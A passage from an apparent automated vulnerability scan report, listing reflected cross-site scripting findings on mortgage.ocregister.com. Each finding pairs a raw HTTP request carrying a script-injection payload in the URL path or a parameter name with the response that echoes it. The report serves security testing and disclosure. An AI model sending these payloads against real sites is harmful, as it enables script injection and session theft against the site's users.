GET /20078d23d"><script>alert(1)</script>6e84ace3326/07/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:45 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078d23d\"><script>alert(1)</script>6e84ace3326/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d03c"><script>alert(1)</script>c44ede61d27 was submitted in the REST URL parameter 2. This input was echoed as 1d03c\"><script>alert(1)</script>c44ede61d27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/071d03c"><script>alert(1)</script>c44ede61d27/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:48 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/071d03c\"><script>alert(1)</script>c44ede61d27/feed/" /> ...[SNIP]...
1.227. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62aca"><script>alert(1)</script>e6bbf50b3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62aca\"><script>alert(1)</script>e6bbf50b3b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/07/?62aca"><script>alert(1)</script>e6bbf50b3b1=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/07/?62aca\"><script>alert(1)</script>e6bbf50b3b1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7bc"><script>alert(1)</script>5aaea72dd5b was submitted in the REST URL parameter 1. This input was echoed as ab7bc\"><script>alert(1)</script>5aaea72dd5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007ab7bc"><script>alert(1)</script>5aaea72dd5b/08/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007ab7bc\"><script>alert(1)</script>5aaea72dd5b/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b467"><script>alert(1)</script>edf8b7e6341 was submitted in the REST URL parameter 2. This input was echoed as 3b467\"><script>alert(1)</script>edf8b7e6341 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/083b467"><script>alert(1)</script>edf8b7e6341/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/083b467\"><script>alert(1)</script>edf8b7e6341/feed/" /> ...[SNIP]...
1.230. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7dfe"><script>alert(1)</script>03f410c0f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7dfe\"><script>alert(1)</script>03f410c0f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/08/?c7dfe"><script>alert(1)</script>03f410c0f9f=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 85278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/08/?c7dfe\"><script>alert(1)</script>03f410c0f9f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193b6"><script>alert(1)</script>602a3651353 was submitted in the REST URL parameter 1. This input was echoed as 193b6\"><script>alert(1)</script>602a3651353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007193b6"><script>alert(1)</script>602a3651353/09/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007193b6\"><script>alert(1)</script>602a3651353/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab9b"><script>alert(1)</script>7e39935c7da was submitted in the REST URL parameter 2. This input was echoed as eab9b\"><script>alert(1)</script>7e39935c7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09eab9b"><script>alert(1)</script>7e39935c7da/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09eab9b\"><script>alert(1)</script>7e39935c7da/feed/" /> ...[SNIP]...
1.233. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7116"><script>alert(1)</script>1999014b26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7116\"><script>alert(1)</script>1999014b26e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09/?a7116"><script>alert(1)</script>1999014b26e=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09/?a7116\"><script>alert(1)</script>1999014b26e=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfb6"><script>alert(1)</script>2ffcd926e6b was submitted in the REST URL parameter 1. This input was echoed as 8bfb6\"><script>alert(1)</script>2ffcd926e6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20078bfb6"><script>alert(1)</script>2ffcd926e6b/10/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:52 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078bfb6\"><script>alert(1)</script>2ffcd926e6b/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" /> ...[SNIP]...
1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:40 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:45 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" /> ...[SNIP]...
1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
